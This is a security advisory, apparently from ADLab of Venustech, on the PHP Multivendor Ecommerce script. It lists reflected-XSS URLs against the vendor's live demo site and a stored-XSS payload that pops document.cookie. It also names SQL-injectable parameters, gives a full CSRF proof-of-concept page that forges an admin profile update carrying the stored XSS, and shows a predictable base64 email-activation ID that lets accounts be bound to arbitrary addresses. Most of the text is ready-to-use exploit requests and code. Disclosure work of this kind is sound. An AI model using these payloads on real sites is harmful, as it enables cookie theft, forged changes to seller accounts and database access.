PHP Multivendor Ecommerce- the lastest version - SQL Injection/Reflect-XSS/Stored-XSS/CSRF/Arbitrary-Binding
ADLab of Venustech
Well, when I pentest the official demo site of PHP Multivendor Ecommerce, I found some vulnerabilities here.
XSS:
Reflect-XSS
XSS1
http://www.fxwebsolution.com/demo/arthi/multivendor/category.php?chid1=40%27%22%3E123%3Cimg%20src=x%20onerror=console.log(/xss/)%3E123%3C%27%22
XSS2
http://www.fxwebsolution.com/demo/arthi/multivendor/seller-view.php?usid=60%27%22123%3Cimg%20src=x%20onerror=console.log(/xss2/)%3E123%3C%27%22
XSS3
http://www.fxwebsolution.com/demo/arthi/multivendor/shopping-cart.php?cusid=60%27%22123%3Cimg%20src=x%20onerror=console.log(/xss3/)%3E123%3C%27%22
XSS4
http://www.fxwebsolution.com/demo/arthi/multivendor/my_wishlist.php?fid=60%27%22123%3Cimg%20src=x%20onerror=console.log(/xss4/)%3E123%3C%27%22
Stored-XSS
http://www.fxwebsolution.com/demo/arthi/multivendor/admin/sellerupd.php?upd=2&uid=36&id=61
POST parameters:
------WebKitFormBoundary2wspk6wZ1zP1BEHR
Content-Disposition: form-data; name="companyname"
abc pvt ltd'"><svg/onload=alert(document.cookie)><'"
SQL Injection:
sqli1
http://www.fxwebsolution.com//demo/arthi/multivendor/seller-view.php?usid=60
sqli2
http://www.fxwebsolution.com/demo/arthi/multivendor/shopping-cart.php?cusid=60
sqli3
http://www.fxwebsolution.com/demo/arthi/multivendor/my_wishlist.php?fid=60
You can see, we can obtain the current data user or more sensitive data now!
CSRF
We can use csrf attack to cheat the user to change sensitive settings in the user panel, even add stored-xss content into it.
poc:
<html>
<body>
<script>history.pushState('', '', '/')</script>
<script>
function submitRequest()
{
var xhr = new XMLHttpRequest();
xhr.open("POST", "http:\/\/www.fxwebsolution.com\/demo\/arthi\/multivendor\/admin\/sellerupd.php?upd=2&uid=36&id=61", true);
xhr.setRequestHeader("Content-Type", "multipart\/form-data; boundary=----WebKitFormBoundary2wspk6wZ1zP1BEHR");
xhr.setRequestHeader("Accept", "text\/html,application\/xhtml+xml,application\/xml;q=0.9,image\/webp,image\/apng,*\/*;q=0.8");
xhr.setRequestHeader("Accept-Language", "zh-CN,zh;q=0.9");
xhr.withCredentials = true;
var body = "------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"idvalue\"\r\n" +
"\r\n" +
"61\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"upd\"\r\n" +
"\r\n" +
"2\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"user_mail\"\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"companyname\"\r\n" +
"\r\n" +
"abc pvt ltd\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"companyname\"\r\n" +
"\r\n" +
"abc pvt ltd\'\"\x3e\x3csvg/onload=alert(document.cookie)\x3e\x3c\'\"\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"about\"\r\n" +
"\r\n" +
"ihguifhugjhufdhgjhd\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"store\"\r\n" +
"\r\n" +
"avc\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"cphone\"\r\n" +
"\r\n" +
"2147483647\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"policy\"\r\n" +
"\r\n" +
"gfgfvhhjj\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"address1\"\r\n" +
"\r\n" +
"chennai\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"address2\"\r\n" +
"\r\n" +
"chennai\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"proof\"; filename=\"\"\r\n" +
"Content-Type: application/octet-stream\r\n" +
"\r\n" +
"\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR\r\n" +
"Content-Disposition: form-data; name=\"_submit\"\r\n" +
"\r\n" +
"Save\r\n" +
"------WebKitFormBoundary2wspk6wZ1zP1BEHR--\r\n";
var aBody = new Uint8Array(body.length);
for (var i = 0; i < aBody.length; i++)
aBody[i] = body.charCodeAt(i);
xhr.send(new Blob([aBody]));
}
</script>
<form action="#">
<input type="button" value="Submit request" onclick="submitRequest();" />
</form>
</body>
</html>
This vulnerability does not need evil attacker to login into the user panel.
Arbitrary-Binding
I found when we're register the account, we should verify the email to activate the account.
But the url which send to the email is predictable. For example, the url the system send to my email is:
http://www.fxwebsolution.com/demo/arthi/multivendor/sign-in.php?eqid=NTA=
After Base64 decode:
http://www.fxwebsolution.com/demo/arthi/multivendor/sign-in.php?eqid=50
So it's easy to predict or enum the eid to activate our account, then we can bind the account to any email-account, even if it's not exist.
In a word, it's a arbitrary-Binding bug here.










